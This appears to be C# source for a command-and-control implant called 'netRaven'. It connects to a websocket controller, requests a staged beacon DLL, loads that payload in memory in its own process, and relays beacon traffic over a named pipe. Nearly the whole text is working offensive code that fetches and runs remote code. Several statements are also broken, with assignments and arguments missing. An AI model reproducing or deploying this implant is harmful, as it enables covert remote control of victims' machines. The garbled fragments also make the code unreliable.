public static void RavenUpgrade() { string arch = ""; // Send the stage request if (IntPtr.Size == 8) { arch = "x64"; } else { arch = "x86"; } byte[] stageReq = Encoding.ASCII.GetBytes(agentID + ":" + arch + ":" + configuration.pipeName + ":" + configuration.block.ToString()); #if DEBUG Console.WriteLine("Sending stage request to server"); #endif string encData = Convert.ToBase64String(stageReq); RavenMessage newMsg = new RavenMessage(); newMsg.msgType = (int)MsgType.stage; newMsg.length = encData.Length; = encData; // Serialize the class into json string jsonString = ser.Serialize(newMsg); // Send to the contoller socket.Send(jsonString); }
private static void on_receive(object sender, MessageReceivedEventArgs e) { // Process every message received // Serialize the string into a RavenMessage object RavenMessage msg = ser.Deserialize <RavenMessage>(e.Message); MsgType t = (MsgType)msg.msgType; switch (t) { case MsgType.stage: byte[] payload = Convert.FromBase64String(; if (payload.Length > 1) { //Trim the frame header payload = new List <byte>(payload).GetRange(4, payload.Length - 4).ToArray(); #if DEBUG File.WriteAllBytes("C:\\Windows\\Tasks\\smb_beacon.dll", payload); Console.WriteLine("Beacon payload written to: C:\\Windows\\Tasks\\smb_beacon.dll"); #endif Loader ldr = new Loader(payload); Thread beaconThread = new Thread(() => { ldr.LoadInCurrentProcess(); }); beaconThread.Start(); ConnectToBeacon(); dataAvailable = true; } break; case MsgType.beacon: byte[] frame = Convert.FromBase64String(; writeFrame(client, frame); dataAvailable = true; break; case MsgType.task: break; case MsgType.key: break; default: break; } }
// Method to start netRaven public static void Run(string throwaway) { #if DEBUG Console.WriteLine("Obtained raven configuration from the embedded resource"); #endif // Establish a connection to the websocket server socket = new WebSocket(configuration.server); // Setup the event handlers socket.Opened += new EventHandler(on_open); socket.Error += new EventHandler <SuperSocket.ClientEngine.ErrorEventArgs>(on_error); socket.Closed += new EventHandler(on_closed); socket.MessageReceived += new EventHandler <MessageReceivedEventArgs>(on_receive); socket.AllowUnstrustedCertificate = true; socket.Open(); while (socket.State == WebSocketState.Connecting && socket.State != WebSocketState.Open) { Thread.Sleep(1000); } // If auto is true, send a stage request if ( { RavenUpgrade(); } //Thread.Sleep(30000); while (socket.State == WebSocketState.Open) { // If beacon is active, connected, and there is data available to read. if (bacon && client.IsConnected && dataAvailable) { byte[] buf = new byte[max_buffer_size]; int read = readFrame(client, ref buf); dataAvailable = false; if (read < 0) { bacon = false; continue; } byte[] frame = new byte[4 + read]; byte[] size = BitConverter.GetBytes(read); Buffer.BlockCopy(size, 0, frame, 0, size.Length); Buffer.BlockCopy(buf, 0, frame, size.Length, read); RavenMessage newMsg = new RavenMessage(); newMsg.msgType = (int)MsgType.beacon; newMsg.length = frame.Length; = Convert.ToBase64String(frame); string jsonMsg = ser.Serialize(newMsg); socket.Send(jsonMsg); } Thread.Sleep(1000); } // Clean up and exit client.Close(); client.Dispose(); Environment.Exit(0); }